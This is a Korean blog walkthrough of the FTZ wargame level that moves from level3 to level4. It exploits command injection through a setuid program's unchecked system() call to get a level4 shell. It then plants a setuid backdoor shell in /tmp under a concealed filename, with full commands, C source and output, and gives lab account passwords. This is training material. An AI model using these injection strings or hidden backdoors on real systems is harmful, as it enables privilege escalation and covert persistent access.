■ Level3 -> Level4
목적
system() 함수의 취약점
■ Level4 문제에 도전하기
level3 사용자로 로그인
-> ID/PASS: level3/can you fly?
[level3@ftz level3]$ ls -l
|
합계 12 -rw-r--r-- 1 root root 543 11월 26 2000 hint drwxr-xr-x 2 root level3 4096 2월 24 2002 public_html drwxrwxr-x 2 root level3 4096 1월 15 2009 tmp |
[level3@ftz level3]$ cat hint
|
다음 코드는 autodig의 소스이다.
#include <stdio.h> #include <stdlib.h> #include <unistd.h>
int main(int argc, char **argv){
char cmd[100];
if( argc!=2 ){ 인자값 하나를 꼭 받아야 한다. printf( "Auto Digger Version 0.9\n" ); printf( "Usage : %s host\n", argv[0] ); exit(0); }
strcpy( cmd, "dig @" ); strcat( cmd, argv[1] ); 첫번째 인자 = IP strcat( cmd, " version.bind chaos txt");
system( cmd ); # dig @168.126.63.1 version.bind chaos txt
}
이를 이용하여 level4의 권한을 얻어라.
more hints. - 동시에 여러 명령어를 사용하려면? - 문자열 형태로 명령어를 전달하려면? |
소스 코드를 통해 알수 있는 내용
(예) # dig @168.126.63.1 version.bind chaos txt
[level3@ftz level3]$ find / -name autodig 2>/dev/null
|
/bin/autodig |
[level3@ftz level3]$ ls -l /bin/autodig
|
-rwsr-x--- 1 level4 level3 12194 8월 19 12:58 /bin/autodig |
[level3@ftz level3]$ find / -user level4 -perm -4000 2>/dev/null
|
/bin/autodig |
[level3@ftz level3]$ /bin/autodig 168.126.63.1
|
; <<>> DiG 9.2.1 <<>> @168.126.63.1 version.bind chaos txt ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42564 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;version.bind. CH TXT ;; ANSWER SECTION: version.bind. 0 CH TXT "Unknown" ;; AUTHORITY SECTION: version.bind. 0 CH NS version.bind. ;; Query time: 20 msec ;; SERVER: 168.126.63.1#53(168.126.63.1) ;; WHEN: Thu Aug 21 22:02:45 2014 ;; MSG SIZE rcvd: 83 |
------------- /bin/autodig ----------------
strcpy( cmd, "dig @" );
strcat( cmd, argv[1] );
strcat( cmd, " version.bind chaos txt");
system( cmd );
------------- /bin/autodig ----------------
# /bin/autodig 168.126.63.1
# dig @168.126.63.1 version.bind chaos txt 코드해석결과
[level3@ftz level3]$ dig @168.126.63.1 version.bind chaos txt
|
; <<>> DiG 9.2.1 <<>> @168.126.63.1 version.bind chaos txt ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8087 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION: ;version.bind. CH TXT
;; ANSWER SECTION: version.bind. 0 CH TXT "Unknown"
;; AUTHORITY SECTION: version.bind. 0 CH NS version.bind.
;; Query time: 31 msec ;; SERVER: 168.126.63.1#53(168.126.63.1) ;; WHEN: Thu Aug 21 22:03:36 2014 ;; MSG SIZE rcvd: 64 |
system함수는 명령어를 그대로 쉘에게 전달한다.
변수값 을 점검하지 않는다.
------------- /bin/autodig ----------------
strcpy( cmd, "dig @" );
strcat( cmd, argv[1] );
strcat( cmd, " version.bind chaos txt");
system( cmd );
------------- /bin/autodig ----------------
# /bin/autodig "168.126.63.1 www.naver.com; id;" ""값이 하나의 인자
# dig @168.126.63.1 www.naver.com; id; version.bind chaos txt
[level3@ftz level3]$ /bin/autodig "168.126.63.1 www.naver.com; id;"
|
; <<>> DiG 9.2.1 <<>> @168.126.63.1 www.naver.com ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58915 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 3, ADDITIONAL: 3 ;; QUESTION SECTION: ;www.naver.com. IN A ;; ANSWER SECTION: www.naver.com. 0 IN CNAME www.naver.com.nheos.com. www.naver.com.nheos.com. 27 IN A 202.179.177.22 www.naver.com.nheos.com. 27 IN A 125.209.222.141 ;; AUTHORITY SECTION: nheos.com. 16451 IN NS ns3.nheos.com. nheos.com. 16451 IN NS ns1.nheos.com. nheos.com. 16451 IN NS ns2.nheos.com. ;; ADDITIONAL SECTION: ns1.nheos.com. 17674 IN A 119.205.240.148 ns2.nheos.com. 16451 IN A 61.247.202.50 ns3.nheos.com. 2641 IN A 175.158.30.74 ;; Query time: 4 msec ;; SERVER: 168.126.63.1#53(168.126.63.1) ;; WHEN: Mon Nov 30 14:50:27 2015 ;; MSG SIZE rcvd: 199 uid=3004(level4) gid=3003(level3) groups=3003(level3) sh: line 1: version.bind: command not found |
에러메세지가 출력되어 결과값이 아직 끝나지 않은 상태이기 때문에 level4의 권한을 가진다.
(version.bind chaos txt)
------------- /bin/autodig ----------------
strcpy( cmd, "dig @" );
strcat( cmd, argv[1] );
strcat( cmd, " version.bind chaos txt");
system( cmd );
------------- /bin/autodig ----------------
# /bin/autodig "168.126.63.1 www.naver.com; bash;"
# dig @168.126.63.1 www.naver.com; bash; version.bind chaos txt
[level3@ftz level3]$ /bin/autodig "168.126.63.1 www.naver.com; bash;"
|
; <<>> DiG 9.2.1 <<>> @168.126.63.1 www.naver.com ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3364 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 3, ADDITIONAL: 3 ;; QUESTION SECTION: ;www.naver.com. IN A ;; ANSWER SECTION: www.naver.com. 0 IN CNAME www.naver.com.nheos.com. www.naver.com.nheos.com. 115 IN A 125.209.222.142 www.naver.com.nheos.com. 115 IN A 125.209.222.141 ;; AUTHORITY SECTION: nheos.com. 20235 IN NS ns2.nheos.com. nheos.com. 20235 IN NS ns3.nheos.com. nheos.com. 20235 IN NS ns1.nheos.com. ;; ADDITIONAL SECTION: ns1.nheos.com. 20235 IN A 119.205.240.148 ns2.nheos.com. 5661 IN A 61.247.202.50 ns3.nheos.com. 170849 IN A 175.158.30.74 ;; Query time: 5 msec ;; SERVER: 168.126.63.1#53(168.126.63.1) ;; WHEN: Mon Nov 30 14:51:59 2015 ;; MSG SIZE rcvd: 199 |
[level4@ftz level3]$ my-pass
|
Level4 Password is "suck my brain".
|
■ 백도어를 생성해 보자.
[level4@ftz level3]$ vi /tmp/backdoor.c
|
int main() { char *cmd[2]; cmd[0]="/bin/bash"; cmd[1]=(void *)0; Null처리를 해야 프로그램 거기까지 인식한다. setreuid(3004,3004); execve(cmd[0], cmd, cmd[1]); int execve (const char *filename, char *const argv [], char *const envp[]); 환경변수는 없고 결국 /bin/bash를 실행하겠다는 뜻이다. } |
[level4@ftz level3]$ gcc -o /tmp/". " /tmp/backdoor.c /* /tmp/". "(점(.) + 공백 한칸) */
[level4@ftz level3]$ chmod 6755 /tmp/". "
[level4@ftz level3]$ ls -al /tmp
|
drwxrwxrwt 5 root root 4096 11¿ù 30 14:56 . -rwsr-sr-x 1 level4 level3 11677 11¿ù 30 14:56 . drwxr-xr-x 20 root root 4096 11¿ù 30 09:44 .. -r--r--r-- 1 root root 11 11¿ù 30 09:46 .X0-lock drwxrwxrwt 2 root root 4096 11¿ù 30 09:46 .X11-unix srwx------ 1 root nobody 0 11¿ù 27 12:00 .fam_socket drwxrwxrwt 2 xfs xfs 4096 11¿ù 30 09:46 .font-unix srw-rw-rw- 1 root root 0 11¿ù 30 09:46 .gdm_socket -rw-r--r-- 1 level4 level3 121 11¿ù 30 14:56 backdoor.c drwx------ 2 root root 4096 11¿ù 27 17:30 orbit-root -rwxrwxr-x 1 level1 level1 11486 11¿ù 30 10:58 sample -rw-rw-r-- 1 level1 level1 570 11¿ù 30 10:57 sample.a -rw-rw-r-- 1 level1 level1 143 11¿ù 30 10:56 sample.c |
[level4@ftz level3]$ rm -f /tmp/backdoor.c
[level4@ftz level3]$ exit
|
exit sh: line 1: version.bind: command not found |
[level3@ftz level3]$ id
|
uid=3003(level3) gid=3003(level3) groups=3003(level3) |
[level3@ftz level3]$ /tmp/". "
|
No value for $TERM and no -T specified No value for $TERM and no -T specified |
-> 에러메세지는 무시한다.
[level4@ftz level3]$ id
|
uid=3004(level4) gid=3003(level3) groups=3003(level3) |
[level4@ftz level3]$ exit
[level3@ftz level3]$
■ 다른 방식으로 백도어를 만들어 보자.
(EX: # /bin/autodig "127.0.0.1;CMD")
/bin/autodig "168.126.63.1 www.naver.com; bash;"
/bin/autodig "127.0.0.1;echo 'int main(){char *cmd[2];cmd[0]=\"/bin/sh\";cmd[1]=(void *)0;' > /tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;echo 'setreuid(3004,3004);execve(cmd[0],cmd,cmd[1]);}' >> /tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;cat /tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;gcc -o /tmp/'.. ' /tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;chmod 6755 /tmp/'.. ';"
(/tmp/backdoor2.c)
|
int main(){char *cmd[2];cmd[0]=\"/bin/sh\";cmd[1]=(void *)0; setreuid(3004,3004);execve(cmd[0],cmd,cmd[1]);} |
|
int main() { char *cmd[2]; cmd[0]=\"/bin/sh\"; cmd[1]=(void *)0; setreuid(3004,3004); execve(cmd[0],cmd,cmd[1]); } |
'Learning > └◆Reversing' 카테고리의 다른 글
| 05_Level5 -> Level6[FTZ] 레이스 컨디션 스크립트 만들기 (0) | 2017.01.23 |
|---|---|
| 05_Level4 -> Level5[FTZ] xinetd 방식 여러가지 로컬/원격 백도어 (0) | 2017.01.20 |
| 03_level2 -> level3[FTZ] vi 편집기 백도어 (0) | 2017.01.19 |
| [실습] C언어 코드와 어셈블리 언어 코드 테이블 제작 (0) | 2017.01.19 |